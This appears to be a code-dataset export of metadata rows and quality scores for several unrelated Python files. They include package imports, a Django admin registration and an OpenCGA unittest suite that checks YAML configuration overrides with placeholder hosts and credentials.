| 0.713235
| 0
| 0.025735
| 0.463211
| 0.059484
| 0
| 0
| 0
| 0
| 0.055147
| 1
| 0.099265
| false
| 0.080882
| 0.022059
| 0
| 0.150735
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
4f28a5c578cb66cd605db53c4108d37e18df02ab
| 152
|
py
|
Python
|
agutil/io/__init__.py
|
agraubert/agutil
|
d9a568df01959ed985c9c8e77bdd501ac13bdbbf
|
[
"MIT"
] | 3
|
2017-06-05T15:46:22.000Z
|
2019-05-22T21:26:54.000Z
|
agutil/io/__init__.py
|
agraubert/agutil
|
d9a568df01959ed985c9c8e77bdd501ac13bdbbf
|
[
"MIT"
] | 93
|
2016-06-22T18:57:47.000Z
|
2022-02-14T10:50:27.000Z
|
agutil/io/__init__.py
|
agraubert/agutil
|
d9a568df01959ed985c9c8e77bdd501ac13bdbbf
|
[
"MIT"
] | null | null | null |
from .src.socket import Socket
from .src.socket import SocketServer
from .src.queuedsocket import QueuedSocket
from .src.mplexsocket import MPlexSocket
| 30.4
| 42
| 0.842105
| 20
| 152
| 6.4
| 0.35
| 0.21875
| 0.203125
| 0.296875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 152
| 4
| 43
| 38
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
4f317e066e36fdf6e670947587e3f0d182bd7e0c
| 178
|
py
|
Python
|
LAB 6/myproj/netflixapp/admin.py
|
giachell/FIS_21-22
|
eda14dabfb2ad73f307a31b26e8112bcceba4b36
|
[
"MIT"
] | 2
|
2021-11-20T10:56:31.000Z
|
2021-11-26T13:33:46.000Z
|
LAB 6/myproj/netflixapp/admin.py
|
giachell/FIS_21-22
|
eda14dabfb2ad73f307a31b26e8112bcceba4b36
|
[
"MIT"
] | null | null | null |
LAB 6/myproj/netflixapp/admin.py
|
giachell/FIS_21-22
|
eda14dabfb2ad73f307a31b26e8112bcceba4b36
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
# Register your models here.
from django.contrib import admin
# Register your models here
from .models import Movie
admin.site.register(Movie)
| 19.777778
| 32
| 0.803371
| 26
| 178
| 5.5
| 0.423077
| 0.13986
| 0.237762
| 0.321678
| 0.727273
| 0.727273
| 0.727273
| 0.727273
| 0.727273
| 0.727273
| 0
| 0
| 0.140449
| 178
| 9
| 33
| 19.777778
| 0.934641
| 0.292135
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
4f39e71946e0fad0b229faa061580ce3eb45db6b
| 147
|
py
|
Python
|
tests/test_cca.py
|
sagar87/cca
|
b4de1c9a46643e3a458bdc773d254f7fb9873d18
|
[
"MIT"
] | null | null | null |
tests/test_cca.py
|
sagar87/cca
|
b4de1c9a46643e3a458bdc773d254f7fb9873d18
|
[
"MIT"
] | null | null | null |
tests/test_cca.py
|
sagar87/cca
|
b4de1c9a46643e3a458bdc773d254f7fb9873d18
|
[
"MIT"
] | null | null | null |
import numpy as np
from cca.cca import CCA
def test_CCA():
pass
# Y = [np.zeros((10, 10)), np.zeros((10, 10))]
# model = CCA(Y, 5)
| 13.363636
| 50
| 0.557823
| 26
| 147
| 3.115385
| 0.538462
| 0.17284
| 0.222222
| 0.271605
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 0.265306
| 147
| 10
| 51
| 14.7
| 0.666667
| 0.421769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
4f67a6e9be1bb29059aefd806964c3981a8a122c
| 214
|
py
|
Python
|
tests/__init__.py
|
contentful/structured-text-renderer.py
|
84fdd139bef2bbc02182a7eba2762604d0777956
|
[
"MIT"
] | 4
|
2019-02-23T20:04:42.000Z
|
2022-01-18T18:23:26.000Z
|
tests/__init__.py
|
contentful/structured-text-renderer.py
|
84fdd139bef2bbc02182a7eba2762604d0777956
|
[
"MIT"
] | 3
|
2018-11-27T22:40:58.000Z
|
2020-10-03T17:54:07.000Z
|
tests/__init__.py
|
contentful/structured-text-renderer.py
|
84fdd139bef2bbc02182a7eba2762604d0777956
|
[
"MIT"
] | 6
|
2019-02-11T16:06:24.000Z
|
2022-01-26T14:18:37.000Z
|
import os
import sys
from .text_renderers_test import *
from .block_renderers_test import *
from .document_renderers_test import *
from .rich_text_renderer_test import *
sys.path.insert(0, os.path.abspath(".."))
| 21.4
| 41
| 0.78972
| 32
| 214
| 5
| 0.46875
| 0.25
| 0.35625
| 0.43125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005263
| 0.11215
| 214
| 9
| 42
| 23.777778
| 0.836842
| 0
| 0
| 0
| 0
| 0
| 0.009346
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.857143
| 0
| 0.857143
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4f9c2fa3c0dacb4885092fe1c04217763dd14abc
| 29,328
|
py
|
Python
|
opencga-app/app/cloud/docker/opencga-init/test/test_override_yaml.py
|
julie-sullivan/opencga
|
9aa03191677a10a8ff805a9d343bbebe71c53b68
|
[
"Apache-2.0"
] | null | null | null |
opencga-app/app/cloud/docker/opencga-init/test/test_override_yaml.py
|
julie-sullivan/opencga
|
9aa03191677a10a8ff805a9d343bbebe71c53b68
|
[
"Apache-2.0"
] | null | null | null |
opencga-app/app/cloud/docker/opencga-init/test/test_override_yaml.py
|
julie-sullivan/opencga
|
9aa03191677a10a8ff805a9d343bbebe71c53b68
|
[
"Apache-2.0"
] | null | null | null |
import subprocess
from shutil import copyfile
import unittest
import yaml
from io import StringIO
import sys
import os
os.chdir(sys.path[0])
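# Change into this test file's directory so that the relative "./conf" copies
# and the "../override_yaml.py" invocations below resolve correctly.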
class Test_init_script(unittest.TestCase):
def setUp(self):
if "OPENCGA_CONFIG_DIR" in os.environ:
config_dir = os.environ["OPENCGA_CONFIG_DIR"]
else:
config_dir = "./conf"
storage_config = os.path.join(config_dir, "storage-configuration.yml")
copyfile(storage_config, "./storage-configuration.yml")
client_config = os.path.join(config_dir, "client-configuration.yml")
copyfile(client_config, "./client-configuration.yml")
config = os.path.join(config_dir, "configuration.yml")
copyfile(config, "./configuration.yml")
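# End-to-end check: run override_yaml.py with a full set of CLI flags plus
# INIT_* environment variables and verify the injected values land in the
# expected places across the three generated YAML documents.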
def test_end_2_end(self):
res = subprocess.run(
[
"python3", "../override_yaml.py",
"--config-path", "./configuration.yml",
"--client-config-path", "./client-configuration.yml",
"--storage-config-path", "./storage-configuration.yml",
"--search-hosts", "test-search-host1,test-search-host2",
"--catalog-database-hosts", "test-catalog-database-host1,test-catalog-database-host2,test-catalog-database-host3",
"--catalog-database-user", "test-catalog-database-user",
"--catalog-database-password", "test-catalog-database-password",
"--catalog-search-hosts", "test-catalog-search-host1,test-catalog-search-host2",
"--catalog-search-user", "test-catalog-search-user",
"--catalog-search-password", "test-catalog-search-password",
"--rest-host", "test-rest-host",
"--grpc-host", "test-grpc-host",
"--max-concurrent-jobs", "25",
"--analysis-execution-mode", "test-analysis-execution-mode",
"--variant-default-engine","test-variant-default-engine",
"--hadoop-ssh-dns", "test-hadoop-ssh-host",
"--hadoop-ssh-user", "test-hadoop-ssh-user",
"--hadoop-ssh-pass", "test-hadoop-ssh-password",
"--hadoop-ssh-remote-opencga-home", "test-hadoop-ssh-remote-opencga-home",
"--health-check-interval", "30"
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=False,
env={**os.environ,
"INIT_CLINICAL_HOSTS": "test-clinical-host",
"INIT_VARIANT_OPTIONS": "[ my_var_key_1=my_value_1, my.var.key_2=my.value.2,]"
}, # Test that the auto-import of environment variables is working
)
if res.returncode != 0:
print("Error calling override_yaml.py:")
print(res.stdout)
sys.exit(1)
configs = []
configsRaw = res.stdout.decode("utf-8").split("---")
for config in configsRaw:
configAsFile = StringIO(config)
configs.append(yaml.safe_load(configAsFile))
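# override_yaml.py prints the rewritten YAML documents separated by "---";
# they are parsed in order: storage, main configuration, client configuration.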
storage_config = configs[0]
config = configs[1]
client_config = configs[2]
self.assertEqual(storage_config["search"]["hosts"][0], "test-search-host1")
self.assertEqual(storage_config["search"]["hosts"][1], "test-search-host2")
self.assertEqual(storage_config["clinical"]["hosts"][0], "test-clinical-host")
self.assertEqual(
storage_config["variant"]["defaultEngine"],
"test-variant-default-engine",
)
self.assertEqual(
storage_config["variant"]["options"]["annotator"],
"cellbase",
)
self.assertEqual(
storage_config["variant"]["engines"][1]["options"][
"storage.hadoop.mr.executor"
],
"ssh",
)
self.assertEqual(
storage_config["variant"]["engines"][1]["options"][
"storage.hadoop.mr.executor.ssh.host"
],
"test-hadoop-ssh-host",
)
self.assertEqual(
storage_config["variant"]["engines"][1]["options"][
"storage.hadoop.mr.executor.ssh.user"
],
"test-hadoop-ssh-user",
)
self.assertEqual(
storage_config["variant"]["engines"][1]["options"][
"storage.hadoop.mr.executor.ssh.password"
],
"test-hadoop-ssh-password",
)
self.assertEqual(
storage_config["variant"]["engines"][1]["options"][
"storage.hadoop.mr.executor.ssh.key"
],
"",
)
self.assertEqual(
storage_config["variant"]["engines"][1]["options"][
"storage.hadoop.mr.executor.ssh.remoteOpenCgaHome"
],
"test-hadoop-ssh-remote-opencga-home",
)
print("Variant options: ", storage_config["variant"]["options"])
# self.assertEqual(
# storage_config["variant"]["options"][
# "my_key"
# ],
# "my_value",
# )
# self.assertEqual(
# storage_config["variant"]["options"][
# "second_key"
# ],
# "my.otherValue",
# )
self.assertEqual(
storage_config["variant"]["options"][
"my_var_key_1"
],
"my_value_1",
)
self.assertEqual(
storage_config["variant"]["options"][
"my.var.key_2"
],
"my.value.2",
)
self.assertEqual(config["healthCheck"]["interval"], "30")
self.assertEqual(
config["catalog"]["database"]["hosts"][0], "test-catalog-database-host1"
)
self.assertEqual(
config["catalog"]["database"]["hosts"][1], "test-catalog-database-host2"
)
self.assertEqual(
config["catalog"]["database"]["hosts"][2], "test-catalog-database-host3"
)
self.assertEqual(
config["catalog"]["database"]["user"], "test-catalog-database-user"
)
self.assertEqual(
config["catalog"]["database"]["password"], "test-catalog-database-password"
)
self.assertEqual(config["catalog"]["database"]["options"]["sslEnabled"], True)
self.assertEqual(config["catalog"]["database"]["options"]["sslInvalidCertificatesAllowed"], True)
self.assertEqual(config["catalog"]["database"]["options"]["authenticationDatabase"], "admin")
self.assertEqual(
config["catalog"]["searchEngine"]["hosts"][0], "test-catalog-search-host1"
)
self.assertEqual(
config["catalog"]["searchEngine"]["hosts"][1], "test-catalog-search-host2"
)
self.assertEqual(
config["catalog"]["searchEngine"]["user"], "test-catalog-search-user"
)
self.assertEqual(
config["catalog"]["searchEngine"]["password"], "test-catalog-search-password"
)
self.assertEqual(config["analysis"]["execution"]["id"], "test-analysis-execution-mode")
self.assertEqual(config["analysis"]["execution"]["maxConcurrentJobs"]["variant-index"], 25)
self.assertEqual(client_config["rest"]["host"], "test-rest-host")
self.assertEqual(client_config["grpc"]["host"], "test-grpc-host")
def test_azure_batch_execution(self):
res = subprocess.run(
[
"python3", "../override_yaml.py",
"--config-path", "./configuration.yml",
"--client-config-path", "./client-configuration.yml",
"--storage-config-path", "./storage-configuration.yml",
"--search-hosts", "test-search-host1,test-search-host2",
"--clinical-hosts", "test-clinical-host",
"--catalog-database-hosts", "test-catalog-database-host1,test-catalog-database-host2,test-catalog-database-host3",
"--catalog-database-user", "test-catalog-database-user",
"--catalog-database-password", "test-catalog-database-password",
"--catalog-search-hosts", "test-catalog-search-host1,test-catalog-search-host2",
"--catalog-search-user", "test-catalog-search-user",
"--catalog-search-password", "test-catalog-search-password",
"--rest-host", "test-rest-host",
"--grpc-host", "test-grpc-host",
"--analysis-execution-mode", "AZURE",
"--batch-account-name", "test-batch-account-name",
"--batch-account-key", "test-batch-account-key",
"--batch-endpoint", "test-batch-endpoint",
"--batch-pool-id", "test-batch-pool-id",
"--max-concurrent-jobs", "25",
"--variant-default-engine","test-variant-default-engine",
"--hadoop-ssh-dns", "test-hadoop-ssh-host",
"--hadoop-ssh-user", "test-hadoop-ssh-user",
"--hadoop-ssh-pass", "test-hadoop-ssh-password",
"--hadoop-ssh-remote-opencga-home", "test-hadoop-ssh-remote-opencga-home",
"--health-check-interval", "30"
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=False,
)
if res.returncode != 0:
print("Error calling override_yaml.py:")
print(res.stdout)
sys.exit(1)
configs = []
configsRaw = res.stdout.decode("utf-8").split("---")
for config in configsRaw:
configAsFile = StringIO(config)
configs.append(yaml.safe_load(configAsFile))
storage_config = configs[0]
config = configs[1]
client_config = configs[2]
self.assertEqual(
config["analysis"]["execution"]["id"], "AZURE"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["azure.batchAccount"], "test-batch-account-name"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["azure.batchKey"], "test-batch-account-key"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["azure.batchUri"], "test-batch-endpoint"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["azure.batchPoolId"], "test-batch-pool-id"
)
self.assertEqual(client_config["rest"]["host"], "test-rest-host")
self.assertEqual(client_config["grpc"]["host"], "test-grpc-host")
def test_kubernetes_execution(self):
res = subprocess.run(
[
"python3", "../override_yaml.py",
"--config-path", "./configuration.yml",
"--client-config-path", "./client-configuration.yml",
"--storage-config-path", "./storage-configuration.yml",
"--search-hosts", "test-search-host1,test-search-host2",
"--clinical-hosts",
"test-clinical-host",
"--catalog-database-hosts", "test-catalog-database-host1,test-catalog-database-host2,test-catalog-database-host3",
"--catalog-database-user", "test-catalog-database-user",
"--catalog-database-password", "test-catalog-database-password",
"--catalog-search-hosts", "test-catalog-search-host1,test-catalog-search-host2",
"--catalog-search-user", "test-catalog-search-user",
"--catalog-search-password", "test-catalog-search-password",
"--rest-host", "test-rest-host",
"--grpc-host", "test-grpc-host",
"--analysis-execution-mode", "k8s",
"--k8s-master-node","test-k8s-master-node",
"--k8s-volumes-pvc-conf","my-pvc-conf",
"--k8s-volumes-pvc-sessions","my-pvc-sessions",
"--k8s-volumes-pvc-variants","my-pvc-variants",
"--k8s-volumes-pvc-analysisconf","my-pvc-analysisconf",
"--max-concurrent-jobs", "25",
"--variant-default-engine","test-variant-default-engine",
"--hadoop-ssh-dns", "test-hadoop-ssh-host",
"--hadoop-ssh-user", "test-hadoop-ssh-user",
"--hadoop-ssh-pass", "test-hadoop-ssh-password",
"--hadoop-ssh-remote-opencga-home", "test-hadoop-ssh-remote-opencga-home",
"--health-check-interval", "30"
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=False,
)
if res.returncode != 0:
print("Error calling override_yaml.py:")
print(res.stdout)
sys.exit(1)
configs = []
configsRaw = res.stdout.decode("utf-8").split("---")
for config in configsRaw:
configAsFile = StringIO(config)
configs.append(yaml.safe_load(configAsFile))
storage_config = configs[0]
config = configs[1]
client_config = configs[2]
self.assertEqual(
config["analysis"]["scratchDir"], "/tmp/opencga_scratch"
)
self.assertEqual(
config["analysis"]["execution"]["id"], "k8s"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["k8s.volumes"][0]["persistentVolumeClaim"]["claimName"], "my-pvc-conf"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["k8s.volumes"][1]["persistentVolumeClaim"]["claimName"], "my-pvc-sessions"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["k8s.volumes"][2]["persistentVolumeClaim"]["claimName"], "my-pvc-variants"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["k8s.volumes"][3]["persistentVolumeClaim"]["claimName"], "my-pvc-analysisconf"
)
self.assertEqual(
config["analysis"]["execution"]["options"]["k8s.masterUrl"], "test-k8s-master-node"
)
def test_cellbasedb_with_empty_hosts(self):
res = subprocess.run(
[
"python3",
"../override_yaml.py",
"--config-path",
"./configuration.yml",
"--client-config-path",
"./client-configuration.yml",
"--storage-config-path",
"./storage-configuration.yml",
"--search-hosts",
"test-search-host1,test-search-host2",
"--clinical-hosts",
"test-clinical-host",
"--catalog-database-hosts",
"test-catalog-host",
"--catalog-database-user",
"test-catalog-database-user",
"--catalog-database-password",
"test-catalog-database-password",
"--catalog-search-hosts",
"test-catalog-search-host1,test-catalog-search-host2",
"--catalog-search-user",
"test-catalog-search-user",
"--catalog-search-password",
"test-catalog-search-password",
"--rest-host",
"test-rest-host",
"--grpc-host",
"test-grpc-host",
"--analysis-execution-mode",
"test-analysis-execution-mode",
"--batch-account-name",
"test-batch-account-name",
"--batch-account-key",
"test-batch-account-key",
"--batch-endpoint",
"test-batch-endpoint",
"--batch-pool-id",
"test-batch-pool-id",
"--max-concurrent-jobs",
"25",
"--variant-default-engine",
"test-variant-default-engine",
"--hadoop-ssh-dns",
"test-hadoop-ssh-host",
"--hadoop-ssh-user",
"test-hadoop-ssh-user",
"--hadoop-ssh-pass",
"test-hadoop-ssh-password",
"--hadoop-ssh-remote-opencga-home",
"test-hadoop-ssh-remote-opencga-home",
"--health-check-interval",
"30",
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=False,
)
if res.returncode != 0:
print("Error calling override_yaml.py:")
print(res.stdout)
sys.exit(1)
configs = []
configsRaw = res.stdout.decode("utf-8").split("---")
for config in configsRaw:
configAsFile = StringIO(config)
configs.append(yaml.safe_load(configAsFile))
storage_config = configs[0]
self.assertEqual(
storage_config["variant"]["options"]["annotator"],
"cellbase",
)
def test_cellbasedb_with_no_db_hosts(self):
res = subprocess.run(
[
"python3",
"../override_yaml.py",
"--config-path",
"./configuration.yml",
"--client-config-path",
"./client-configuration.yml",
"--storage-config-path",
"./storage-configuration.yml",
"--search-hosts",
"test-search-host1,test-search-host2",
"--clinical-hosts",
"test-clinical-host",
"--catalog-database-hosts",
"test-catalog-host",
"--catalog-database-user",
"test-catalog-database-user",
"--catalog-database-password",
"test-catalog-database-password",
"--catalog-search-hosts",
"test-catalog-search-host1,test-catalog-search-host2",
"--catalog-search-user",
"test-catalog-search-user",
"--catalog-search-password",
"test-catalog-search-password",
"--rest-host",
"test-rest-host",
"--grpc-host",
"test-grpc-host",
"--analysis-execution-mode",
"test-analysis-execution-mode",
"--batch-account-name",
"test-batch-account-name",
"--batch-account-key",
"test-batch-account-key",
"--batch-endpoint",
"test-batch-endpoint",
"--batch-pool-id",
"test-batch-pool-id",
"--max-concurrent-jobs",
"25",
"--variant-default-engine",
"test-variant-default-engine",
"--hadoop-ssh-dns",
"test-hadoop-ssh-host",
"--hadoop-ssh-user",
"test-hadoop-ssh-user",
"--hadoop-ssh-pass",
"test-hadoop-ssh-password",
"--hadoop-ssh-remote-opencga-home",
"test-hadoop-ssh-remote-opencga-home",
"--health-check-interval",
"30",
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=False,
)
if res.returncode != 0:
print("Error calling override_yaml.py:")
print(res.stdout)
sys.exit(1)
configs = []
configsRaw = res.stdout.decode("utf-8").split("---")
for config in configsRaw:
configAsFile = StringIO(config)
configs.append(yaml.safe_load(configAsFile))
storage_config = configs[0]
self.assertEqual(
storage_config["variant"]["options"]["annotator"],
"cellbase",
)
def test_cellbase_rest_set(self):
res = subprocess.run(
[
"python3",
"../override_yaml.py",
"--cellbase-rest-url",
"http://test-cellbase-server1:8080",
"--config-path",
"./configuration.yml",
"--client-config-path",
"./client-configuration.yml",
"--storage-config-path",
"./storage-configuration.yml",
"--search-hosts",
"test-search-host1,test-search-host2",
"--clinical-hosts",
"test-clinical-host",
"--catalog-database-hosts",
"test-catalog-host",
"--catalog-database-user",
"test-catalog-database-user",
"--catalog-database-password",
"test-catalog-database-password",
"--catalog-search-hosts",
"test-catalog-search-host1,test-catalog-search-host2",
"--catalog-search-user",
"test-catalog-search-user",
"--catalog-search-password",
"test-catalog-search-password",
"--rest-host",
"test-rest-host",
"--grpc-host",
"test-grpc-host",
"--analysis-execution-mode",
"test-analysis-execution-mode",
"--batch-account-name",
"test-batch-account-name",
"--batch-account-key",
"test-batch-account-key",
"--batch-endpoint",
"test-batch-endpoint",
"--batch-pool-id",
"test-batch-pool-id",
"--max-concurrent-jobs",
"25",
"--variant-default-engine",
"test-variant-default-engine",
"--hadoop-ssh-dns",
"test-hadoop-ssh-host",
"--hadoop-ssh-user",
"test-hadoop-ssh-user",
"--hadoop-ssh-pass",
"test-hadoop-ssh-password",
"--hadoop-ssh-remote-opencga-home",
"test-hadoop-ssh-remote-opencga-home",
"--health-check-interval",
"30",
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=False,
)
if res.returncode != 0:
print("Error calling override_yaml.py:")
print(res.stdout)
sys.exit(1)
configs = []
configsRaw = res.stdout.decode("utf-8").split("---")
for config in configsRaw:
configAsFile = StringIO(config)
configs.append(yaml.safe_load(configAsFile))
storage_config = configs[0]
self.assertEqual(
storage_config["variant"]["options"]["annotator"],
"cellbase",
)
self.assertEqual(
storage_config["cellbase"]["host"], "http://test-cellbase-server1:8080"
)
def test_cellbase_rest_empty_set(self):
res = subprocess.run(
[
"python3",
"../override_yaml.py",
"--cellbase-rest-url",
"",
"--config-path",
"./configuration.yml",
"--client-config-path",
"./client-configuration.yml",
"--storage-config-path",
"./storage-configuration.yml",
"--search-hosts",
"test-search-host1,test-search-host2",
"--clinical-hosts",
"test-clinical-host",
"--catalog-database-hosts",
"test-catalog-host",
"--catalog-database-user",
"test-catalog-database-user",
"--catalog-database-password",
"test-catalog-database-password",
"--catalog-search-hosts",
"test-catalog-search-host1,test-catalog-search-host2",
"--catalog-search-user",
"test-catalog-search-user",
"--catalog-search-password",
"test-catalog-search-password",
"--rest-host",
"test-rest-host",
"--grpc-host",
"test-grpc-host",
"--analysis-execution-mode",
"test-analysis-execution-mode",
"--batch-account-name",
"test-batch-account-name",
"--batch-account-key",
"test-batch-account-key",
"--batch-endpoint",
"test-batch-endpoint",
"--batch-pool-id",
"test-batch-pool-id",
"--max-concurrent-jobs",
"25",
"--variant-default-engine",
"test-variant-default-engine",
"--hadoop-ssh-dns",
"test-hadoop-ssh-host",
"--hadoop-ssh-user",
"test-hadoop-ssh-user",
"--hadoop-ssh-pass",
"test-hadoop-ssh-password",
"--hadoop-ssh-remote-opencga-home",
"test-hadoop-ssh-remote-opencga-home",
"--health-check-interval",
"30",
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=False,
)
if res.returncode != 0:
print("Error calling override_yaml.py:")
print(res.stdout)
sys.exit(1)
configs = []
configsRaw = res.stdout.decode("utf-8").split("---")
for config in configsRaw:
configAsFile = StringIO(config)
configs.append(yaml.safe_load(configAsFile))
storage_config = configs[0]
self.assertEqual(
storage_config["variant"]["options"]["annotator"],
"cellbase",
)
self.assertEqual(
storage_config["cellbase"]["host"],
"https://ws.opencb.org/cellbase/",
)
def test_cellbase_rest_not_set(self):
res = subprocess.run(
[
"python3",
"../override_yaml.py",
"--config-path",
"./configuration.yml",
"--client-config-path",
"./client-configuration.yml",
"--storage-config-path",
"./storage-configuration.yml",
"--search-hosts",
"test-search-host1,test-search-host2",
"--clinical-hosts",
"test-clinical-host",
"--catalog-database-hosts",
"test-catalog-host",
"--catalog-database-user",
"test-catalog-database-user",
"--catalog-database-password",
"test-catalog-database-password",
"--catalog-search-hosts",
"test-catalog-search-host1,test-catalog-search-host2",
"--catalog-search-user",
"test-catalog-search-user",
"--catalog-search-password",
"test-catalog-search-password",
"--rest-host",
"test-rest-host",
"--grpc-host",
"test-grpc-host",
"--analysis-execution-mode",
"test-analysis-execution-mode",
"--batch-account-name",
"test-batch-account-name",
"--batch-account-key",
"test-batch-account-key",
"--batch-endpoint",
"test-batch-endpoint",
"--batch-pool-id",
"test-batch-pool-id",
"--max-concurrent-jobs",
"25",
"--variant-default-engine",
"test-variant-default-engine",
"--hadoop-ssh-dns",
"test-hadoop-ssh-host",
"--hadoop-ssh-user",
"test-hadoop-ssh-user",
"--hadoop-ssh-pass",
"test-hadoop-ssh-password",
"--hadoop-ssh-remote-opencga-home",
"test-hadoop-ssh-remote-opencga-home",
"--health-check-interval",
"30",
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=False,
)
if res.returncode != 0:
print("Error calling override_yaml.py:")
print(res.stdout)
sys.exit(1)
configs = []
configsRaw = res.stdout.decode("utf-8").split("---")
for config in configsRaw:
configAsFile = StringIO(config)
configs.append(yaml.safe_load(configAsFile))
storage_config = configs[0]
self.assertEqual(
storage_config["variant"]["options"]["annotator"],
"cellbase",
)
self.assertEqual(
storage_config["cellbase"]["host"],
"https://ws.opencb.org/cellbase/",
)
# TODO: Tests for k8s config
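# Sketch (not part of the original suite; the name and argument handling are
# illustrative assumptions only): every test above repeats the same steps --
# run ../override_yaml.py, split its stdout on the YAML document separator "---",
# and yaml.safe_load each chunk. A hypothetical helper like the one below could
# hold that shared plumbing, using the same subprocess/yaml/StringIO imports the
# tests already rely on.
def run_override_yaml(extra_args):
    """Run ../override_yaml.py with extra_args and return the parsed YAML documents."""
    res = subprocess.run(
        ["python3", "../override_yaml.py"] + list(extra_args),
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        check=False,
    )
    if res.returncode != 0:
        raise AssertionError(
            "override_yaml.py failed:\n" + res.stdout.decode("utf-8")
        )
    return [
        yaml.safe_load(StringIO(doc))
        for doc in res.stdout.decode("utf-8").split("---")
    ]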
if __name__ == "__main__":
unittest.main()
| 38.896552
| 134
| 0.496011
| 2,575
| 29,328
| 5.597282
| 0.067573
| 0.054187
| 0.042462
| 0.044682
| 0.880733
| 0.85631
| 0.813224
| 0.775064
| 0.7598
| 0.749879
| 0
| 0.009577
| 0.348472
| 29,328
| 753
| 135
| 38.948207
| 0.744714
| 0.010093
| 0
| 0.783505
| 0
| 0.004418
| 0.409125
| 0.229513
| 0
| 0
| 0
| 0.001328
| 0.076583
| 1
| 0.013255
| false
| 0.063328
| 0.010309
| 0
| 0.025037
| 0.025037
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
96c5b77f57fc07e706419be266dce25818115dac
| 272
|
py
|
Python
|
thad_roberts_model/__init__.py
|
lukaszp/thad-roberts-model
|
7fcdab69e34228321aa8b83215800ba75cf9ad55
|
[
"MIT"
] | null | null | null |
thad_roberts_model/__init__.py
|
lukaszp/thad-roberts-model
|
7fcdab69e34228321aa8b83215800ba75cf9ad55
|
[
"MIT"
] | null | null | null |
thad_roberts_model/__init__.py
|
lukaszp/thad-roberts-model
|
7fcdab69e34228321aa8b83215800ba75cf9ad55
|
[
"MIT"
] | null | null | null |
import thad_roberts_model.measurement
import thad_roberts_model.particles_masses
import thad_roberts_model.thad_roberts_model
from thad_roberts_model.measurement import *
from thad_roberts_model.particles_masses import *
from thad_roberts_model.thad_roberts_model import *
| 45.333333
| 51
| 0.904412
| 39
| 272
| 5.846154
| 0.205128
| 0.385965
| 0.561404
| 0.289474
| 0.929825
| 0.605263
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 272
| 6
| 51
| 45.333333
| 0.894118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
96ccf8ea892432c411d077e414be0bfd248f2b43
| 13,808
|
py
|
Python
|
tests/test_template_message_encodings.py
|
thunderbirdtr/mailmerge
|
